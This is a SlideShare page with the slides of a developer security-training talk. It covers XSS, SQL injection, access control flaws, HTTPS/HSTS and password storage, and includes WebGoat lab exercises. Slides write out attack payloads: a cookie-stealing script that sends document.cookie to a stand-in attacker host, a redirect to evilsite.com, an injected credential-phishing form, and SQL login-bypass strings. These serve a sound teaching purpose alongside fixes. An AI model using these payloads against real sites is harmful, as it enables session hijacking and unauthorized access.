0
Developer-first security
Integrating Security into
Development

Michael Coates
!
michael@ShapeSecurity.com
michael-coates.b...
About Me

michael@shapesecurity.com
Reality
“The global cost of cybercrime is greater than the combined effect on
the global economy of trafficking in marijuana, heroi...
Data Loss & Breaches

datalossdb.org

Verizon Data Breach
Report 2013
Outside Attackers

datalossdb.org

Verizon Data Breach
Report 2013
Security - Into The Details
•

Sample and Demo of Top Application Risks

— Cross Site Scripting, SQL Injection, Access
Con...
WARNING

Security Testing is
ILLEGAL ON UNAUTHORIZED SYSTEMS
3 Dangerous
Vulnerabilities
Cross Site Scripting
SQL Injection
Access Control
What are Web Requests
Open console & enter the following:


•



telnet google.com 80

GET / HTTP/1.1
•

Hit return 2 time...
Cross Site Scripting (XSS)
•

Problem: User controlled data returned in HTTP
response contains HTML/JavaScript code

•

Im...
XSS Behind The Scenes
http://shinypage.com?user=Bob
JSP Code

<h1>Glad to see you <%= request.getParameter("name") %></h1>...
XSS Behind The Scenes
http://shinypage.com?user=friend</b>

<br><form method=”post”
action=”badsite.com/login”> 

Login: <...
XSS - Injecting HTML

Rendered HTML
Cross Site Scripting
•

Cross Site Scripting typically uses JavaScript to
do bad things
•

Steal session cookies
<script>a...
Lab! - Reflected XSS
Reflected XSS Lab
•

Lesson: Cross-Site Scripting->Reflected
XSS Attacks

•

Proxy Not Needed
Lab! - Stored XSS
Stored XSS Lab
•

Lesson: Cross-Site Scripting>Stored XSS Attacks

•

Proxy Not Needed
XSS Prevention
•

Solution

1. Output Encoding - converts command
characters to benign characters for display

2. Input Va...
XSS Attempt Revisited
http://shinypage.com?user=friend</b>

<br><form method=”post”
action=”badsite.com/login”> 

Login: <...
Safe Handling
Rendered HTML
Glad to see you friend</b>

<br><form method="post" action="badsite.com/
login"> 

Login: <inp...
XSS Resources
•

OWASP XSS Prevention Cheat Sheet 

- http://bit.ly/XSS-OWASP

•

Content Security Policy 

- http://bit.l...
SQL Injection
•

Problem: User controlled data improperly used with SQL
statements

•

Impact: Arbitrary SQL Execution, Da...
Lab! - SQL Lesson
SQL Injection
•

Lesson: Injection Flaws ->
Lab: SQL Injection ->
Stage 1: String SQL
Injection

•

Proxy Needed

•

Objec...
SQL Injection
•

HTTP Post

employee_id=112&password=x' OR ‘1'='1 &action=Login

•

Vulnerable SQL

Select user from UserT...
SQL Injection
•

Parameterized Queries

No confusion with control characters

Example: would look for password of ‘ or ‘1’...
SQL Injection Resources

•

https://www.owasp.org/index.php/
SQL_Injection_Prevention_Cheat_Sheet
Access Control
•

Problem: Developers assume some parts of app can’t be seen,
tampered with or invoked by the user

•

Imp...
Lab! - Access Control
Access Control Violation
•

Lesson: Access Control Flaws>LAB: Role Based Access
Control->Stage 1: Bypass
Business Layer Ac...
Access Control Violation
•

Hint: Login with Tom and perform available
actions (search staff, view profile). Figure out
how...
Strong Access Controls
•

Access Control Performed Server Side

•

Never Relies Upon “Security by Obscurity”

•

Be Carefu...
Access Control Resources

•

https://www.owasp.org/index.php/
Access_Control_Cheat_Sheet
Who’s Monitoring Your
Traffic?
Insecure Session
Management
•

Secure login over HTTPS
•

•

Password submitted encrypted

Immediate redirect to HTTP
•

S...
Vulnerable Redirects
•

User requests HTTP page, response redirects
HTTPS

•

302 Response is HTTP <-- Vulnerability Point
Secure Design for
Communication
•

Use HTTPS Throughout Web Site!

•

HTTP Strict Transport Security (HSTS)!
•
•

•

Opt-i...
Strict Transport Security
•

Browser prevents HTTP requests to HSTS site

•

Any request to site is “upgraded” to HTTPS

•...
Secure Data Storage
& Protection
Password Storage
Bad Approaches!
•

Your own algorithm

•

Good Approach!

md5

encryption

•

base64 encoding

•

rot 13
...
What Are We Protecting?
Correct password hashing protects against:!
!
•

Offline attacks of password repository
!

•

Brute...
Architecture for Sensitive
Data
https://site.com

web server

internal SSL

database
Monitor
Database Queries &
Response S...
Encrypting Sensitive Data in
Database
Encrypt
User Data
Customer/Group
Encryption Key
Key Encrypting Key

database

Decryp...
Growing Threats
Plaguing Applications
Denial of Service
Denial of Service (DOS)

Distributed Denial of Service (DDOS)
Denial of Service
Network DDOS

Application Layer DDOS
site.com/generateReport

Exhaust Network!
Bandwidth

Exhaust Server...
Application Denial of
Service
Application DDOS !

Traditional Network DDOS !
•

overwhelms target with
volume

•

•

•

•
...
Credential Stuffing
compromised!
server!

Credentials!
joe: abc123!
sue: password1!
bob: MyP0n3y

Stolen Credentials!
joe: ...
Take Aways
•

Understand top security threats and anticipate
potential malicious use of application to design
secure code
...
Thanks!
michael@ShapeSecurity.com
http://michael-coates.blogspot.com
@_mwc
Virtual Security
Training Lab Setup
Software
•

Vulnerable Server: OWASP’s Webgoat

•

Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)

•

Browser

•

Virtual Mac...
Test Connectivity to VM
1.Open Browser
2.Browse to your VM ip (listed in
VM login page)

•

e.g. http://192.168.56.101

3....
WebGoat
•

Click First Link - OWASP
WebGoat version 5.3.x

•

Username / Password is
guest / guest
Understanding the Proxy
•

Proxy is middle-man between browser and web
server

•

Assists with traffic manipulation & inspe...
Understanding the Proxy
Primary OS

Browser

Web Proxy

Your Computer

VM

Web Server
Enabling Proxy
1.Open ZAP
2.Configure Firefox to use proxy
3.Resend Request
4.Confirm received by proxy
5.Forward to web ser...
Using A Proxy
•

ZAP - Configure to listen on 8080
Set Firefox Proxy
•

Set Firefox proxy to 8080
•

Preferences 

-> Advanced 

-> Network 

-> Settings

•

Set HTTP Proxy
...
Confirm Setup Works
•

Refresh Web Browser

•

Go to ZAP

•

See site in left-hand column
Intercepting Traffic
•

Add a “breakpoint” by right clicking on the page and choosing
“Break...”
!
!
!
!

•

Refresh the we...
“Hello World” of Proxies
•

Lesson: General->Http Basic

•

Objective:
•

Enter your name into text box

•

Intercept with...
Upcoming SlideShare
Loading in...5
×

Devbeat Conference - Developer First Security

9,522

Published on

Topics include:

- Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control

- Who’s Monitoring Your Traffic?
— Encrypting in Transit
Secure Data Storage & Protection
— Correct Password

-Storage & Data Protection

-Growing Threats Plaguing Applications

Published in: Technology, Business
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
9,522
On Slideshare
0
From Embeds
0
Number of Embeds
38
Actions
Shares
0
Downloads
24
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Transcript of "Devbeat Conference - Developer First Security"

  1. 1. Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
  2. 2. About Me michael@shapesecurity.com
  3. 3. Reality
  4. 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
  5. 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  6. 6. Outside Attackers datalossdb.org Verizon Data Breach Report 2013
  7. 7. Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
  8. 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  9. 9. 3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
  10. 10. What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
  11. 11. Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
  12. 12. XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
  13. 13. XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  14. 14. XSS - Injecting HTML Rendered HTML
  15. 15. Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
  16. 16. Lab! - Reflected XSS
  17. 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  18. 18. Lab! - Stored XSS
  19. 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  20. 20. XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; ' &amp;
  21. 21. XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  22. 22. Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  23. 23. XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  24. 24. SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  25. 25. Lab! - SQL Lesson
  26. 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  27. 27. SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
  28. 28. SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

  29. 29. SQL Injection Resources • https://www.owasp.org/index.php/ SQL_Injection_Prevention_Cheat_Sheet
  30. 30. Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

  31. 31. Lab! - Access Control
  32. 32. Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  33. 33. Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  34. 34. Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
  35. 35. Access Control Resources • https://www.owasp.org/index.php/ Access_Control_Cheat_Sheet
  36. 36. Who’s Monitoring Your Traffic?
  37. 37. Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
  38. 38. Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
  39. 39. Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
  40. 40. Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
  41. 41. Secure Data Storage & Protection
  42. 42. Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
  43. 43. What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
  44. 44. Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
  45. 45. Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
  46. 46. Growing Threats Plaguing Applications
  47. 47. Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
  48. 48. Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
  49. 49. Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
  50. 50. Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
  51. 51. Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  52. 52. Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
  53. 53. Virtual Security Training Lab Setup
  54. 54. Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  55. 55. Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  56. 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  57. 57. Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
  58. 58. Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
  59. 59. Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  60. 60. Using A Proxy • ZAP - Configure to listen on 8080
  61. 61. Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
  62. 62. Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
  63. 63. Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  64. 64. “Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×